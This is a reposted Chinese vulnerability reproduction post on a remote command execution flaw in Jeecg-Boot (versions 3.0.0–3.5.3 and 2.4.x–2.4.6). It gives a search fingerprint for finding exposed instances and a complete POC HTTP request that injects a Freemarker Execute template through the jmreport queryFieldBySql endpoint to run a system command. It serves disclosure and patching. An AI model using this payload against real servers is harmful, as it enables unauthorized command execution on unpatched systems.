文章总结： Jeecg-Boot企业级低代码平台存在远程命令执行漏洞，影响3.0.0至3.5.3及2.4.x至2.4.6版本。因接口对用户SQL输入过滤不严，攻击者可利用Freemarker模板引擎注入恶意代码执行系统命令。文中附带了针对特定接口的POC验证代码，建议受影响用户立即升级至最新版本进行修复。 综合评分： 85 文章分类： 漏洞POC,漏洞分析,WEB安全

Jeecg-Boot 远程命令执行漏洞 附POC

原创

安服仔 安服仔

北风漏洞复现文库

2026年2月5日 10:57 广东

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

#

#

01

—

漏洞名称

Jeecg-Boot 远程命令执行漏洞

02

—

影响版本

Jeecg-Boot版本3.0.0至3.5.3或者Jeecg-Boot版本2.4.x至2.4.6

03

—

漏洞简介

Jeecg-Boot是一款企业级低代码开发平台，集成了AI应用功能，旨在帮助开发者快速实现低代码开发和构建个性化AI应用。该平台采用前后端分离架构，基于SpringBoot、SpringCloud、Vue3等主流技术栈，具备强大的代码生成器，可一键生成前后端代码，显著减少重复性工作，提高开发效率。Jeecg-Boot远程命令执行漏洞源于接口对用户输入的SQL语句未进行严格过滤和验证，攻击者可通过构造恶意SQL语句，利用Freemarker模板引擎的特性，将恶意代码注入到模板中执行，从而实现远程命令执行。

04

—

资产测绘

"Jeecg-Boot 企业级快速开发平台"

05

—

漏洞复现

POC

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1Host: 127.0.0.1Connection: closePragma: no-cacheCache-Control: no-cachesec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=gNyJ0QkLIu1GswcpojLsUJVJD2h-kC_u20kPE6FCContent-Type: application/jsonContent-Length: 94
{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"id\") }' "}

06

—

修复建议

升级到最新版本

07

—

往期回顾

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北风漏洞复现文库 安服仔 安服仔《Jeecg-Boot 远程命令执行漏洞 附POC》